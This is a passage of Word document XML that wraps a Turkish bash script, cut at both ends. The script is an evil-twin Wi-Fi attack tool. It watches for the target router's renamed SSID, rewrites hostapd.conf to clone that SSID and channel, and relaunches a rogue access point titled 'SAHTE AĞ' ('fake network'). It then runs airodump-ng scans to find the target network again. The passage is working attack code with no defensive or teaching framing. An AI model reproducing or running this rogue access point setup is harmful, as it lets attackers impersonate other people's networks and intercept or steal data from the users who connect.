    <w:p w14:paraId="40F44AD9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                   then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E83188" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                if  [ "$durum4" = "" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C13248" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="42B2C202" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC99600" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768C5E94" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                            if  [ "$durum5" = "" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02155924" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="080979D9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                            then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E941D0C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432B546E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                            echo ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7052CD0F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3391B522" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                            else     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DE966A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="313D6223" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             echo "MODEMİN ADINI DEĞİŞTİRDİLER.YENİ AD $durum5"       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEA957C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34757570" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192716CB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             killall hostapd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA219B4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C0CB75" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534A22C4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E249C2F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             Host_SSID=$durum5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D888EE4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             echo "interface=$WIFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADE962C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>driver=nl80211</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0833EB8E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>ssid=$Host_SSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE06AB2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>channel=$Host_CHAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6A0CC7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>"&gt;$DUMP_PATH/hostapd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6578E729" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FFFFFF" -title "SAHTE AĞ" -e hostapd $DUMP_PATH/hostapd.conf &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A490AED" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3509AE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C11B0D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                               fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B37761A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="69BA75A5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31403B1C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                else     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08285C38" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="0F6688EB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                echo "MODEMİN ADINI DEĞİŞTİRDİLER.YENİ AD $durum4"        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F582A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>killall hostapd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B063752" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18852C91" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480B801B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3E65F2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             Host_SSID=$durum4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D9E277" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             echo "interface=$WIFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D191EC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>driver=nl80211</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD7E866" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>ssid=$Host_SSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FB51F1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>channel=$Host_CHAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C836FEE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>"&gt;$DUMP_PATH/hostapd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7969CE15" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FFFFFF" -title "SAHTE AĞ" -e hostapd $DUMP_PATH/hostapd.conf &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B13E68D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                fi      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758090DA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6041EF1C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                   else     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7EDF02" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="0A3E47C4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                   echo "MODEMİN ADINI DEĞİŞTİRDİLER.YENİ AD $durum3"        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1253DD3B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       killall hostapd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365AEEA9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59829525" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A09EC9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F83F8B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             Host_SSID=$durum3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AA65A8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             echo "interface=$WIFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0A98D1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>driver=nl80211</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30953D4A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>ssid=$Host_SSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685D1A48" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>channel=$Host_CHAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C62EE8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>"&gt;$DUMP_PATH/hostapd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C026E46" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FFFFFF" -title "SAHTE AĞ" -e hostapd $DUMP_PATH/hostapd.conf &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544D2DCC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                    fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE2D80E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C876EF9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       else     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B910C9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="70C5D00D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       echo "MODEMİN ADINI DEĞİŞTİRDİLER.YENİ AD $durum2"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCB652D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>killall hostapd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F56342" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EDDB2E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FE4562" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B899FF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             Host_SSID=$durum2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F87380" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             echo "interface=$WIFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A73C142" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>driver=nl80211</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C9B20F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>ssid=$Host_SSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C09BF3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>channel=$Host_CHAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792BA373" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>"&gt;$DUMP_PATH/hostapd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2A5B74" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FFFFFF" -title "SAHTE AĞ" -e hostapd $DUMP_PATH/hostapd.conf &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66034189" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F62127" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E629CB9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">else     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582350F4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="5DE58245" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       echo "MODEMİN ADINI DEĞİŞTİRDİLER.YENİ AD $durum"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C384E8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       killall hostapd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCE8B15" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BA4D18" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632C487D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E5DB26" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             Host_SSID=$durum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71151552" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                             echo "interface=$WIFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DFE6CB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>driver=nl80211</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A5EB43" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>ssid=$Host_SSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503F4A4C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>channel=$Host_CHAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27122119" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>"&gt;$DUMP_PATH/hostapd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8C8D9A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FFFFFF" -title "SAHTE AĞ" -e hostapd $DUMP_PATH/hostapd.conf &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14213EC4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="5A719561" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527CA293" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1275B04E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="47F95E14" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="449AF284" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="07569636" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCD4A72" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ADAD11" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED51AC0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70700CB7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="15A4C7F0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6D96F49D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="53330E3D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="68B626E1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="2EFE7515" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DE7D51" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="5C7A92B2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="655AA3AF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6146556D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6248232B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="047A0A08" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="58DF8D7A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>############################################################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1343607B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1AD91C63" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1622C34E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>a=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAB49CC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>#######################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3AF55F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1CE40452" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="72868A37" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>rm -rf $DUMP_PATH/elsikisma*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E714450" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4A566CEE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>xterm -e airodump-ng -w $DUMP_PATH/elsikisma -a $WIFI_MONITOR2 &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709DC551" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6FA7B2FA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>sleep 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8A1915" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3FF102A3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>killall airodump-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFEF00C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1E4BC51E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>calisilanag=" "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD5D1AF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="34DA12D9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">calisilanag=`grep "$Host_SSID" $DUMP_PATH/elsikisma-01.csv | awk '{print $1}'`  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D11D45E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
